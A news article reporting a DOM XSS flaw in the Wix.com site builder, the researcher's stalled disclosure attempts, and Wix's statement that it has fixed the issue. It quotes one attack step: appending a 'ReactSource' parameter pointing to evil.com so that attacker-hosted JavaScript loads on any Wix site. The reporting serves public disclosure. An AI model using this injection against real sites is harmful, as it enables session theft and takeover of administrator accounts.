Wix.com security flaw places millions of websites at risk

Updated: The bug, discovered and disclosed in October, is an XSS flaw which can lead to compromised admin accounts.
Written by Charlie Osborne, Contributing Writer

An XSS vulnerability discovered on the Wix.com platform is putting millions of websites and their users at risk of attack.

The website hosting provider, which provides free drag-and-drop website building tools, hosts millions of websites with 87 million registered users -- and all of which are currently vulnerable to an XSS bug which can be utilized by attackers to create worms capable of taking over administrator accounts. This, in turn, gives attackers full control over websites.

On Wednesday, Matt Austin, security research engineer with Contrast Security, said in a blog post that Wix.com has a severe DOM XSS vulnerability which can be exploited by simply adding a single parameter to any site created on Wix.com.

All an attacker needs to do is add a redirection command to any URL from Wix.com and redirect to malicious JavaScript hosted elsewhere. For example:

Add: ? ReactSource=http://evil.com to any URL for any site created on wix.com. Make sure evil.com hosts a malicious file at / packages-bin/wixCodeInit/wixCodeInit.min.js

By adding this simple code, attackers can ensure their JavaScript is loaded and run as part of the target website, according to the researcher.

Attackers can also use template demos, hosted on the main Wix.com domain -- and vulnerable -- to gain access to admin session cookies and resources. Once a session cookie has been stolen, attackers can place the DOM XSS in an iframe to host malicious content on any website controlled by a single operator.

If such an attack is successful, once a hacker has administrator-level control of the Wix.com domain, they have free reign to do as they wish -- including spreading malware, modifying the website, cryptocurrency mining, altering account credentials, and potentially even use the compromised domain as part of a browser-based botnet.

Austin says that on October 10, he requested a security contact to disclose the issue. The next day, the researcher once again requested a contact and was given a support ticket. However, after receiving a generic "We are investigating the matter and will follow up as soon as possible" message and sending frequent request updates over October, Austin then sent a direct email to support@wix.com and security@wix.com.

The response from Wix.com stated that the "group you tried to contact (security) may not exist, or you may not have permission to post messages to the group."

The problem remains unpatched and it appears that Wix.com, despite being responsible for the security of millions of users, has yet to get its act together when it comes to security and disclosures.

See also: Wix now integrates with Facebook for ad campaigns

In related news, last month WordPress founder Matt Mullenweg accused Wix.com of being "built with stolen code." The executive has accused Wix.com of having "copied WordPress without attribution, credit, or following the license."

Wix.com CEO Avishai Abrahami admitted that aspects of the Wix.com platform are based on the WordPress open-source library, but everything which was improved upon was released back to the open-source community.

Update 11.57 GMT: A Wix spokesperson told ZDNet:

"We take the security of our customers very seriously. After thorough examination we can state that the issue has been addressed. We do operate a formal bug bounty program and are taking steps to widen the community."

10 things you didn't know about the Dark Web

Editorial standards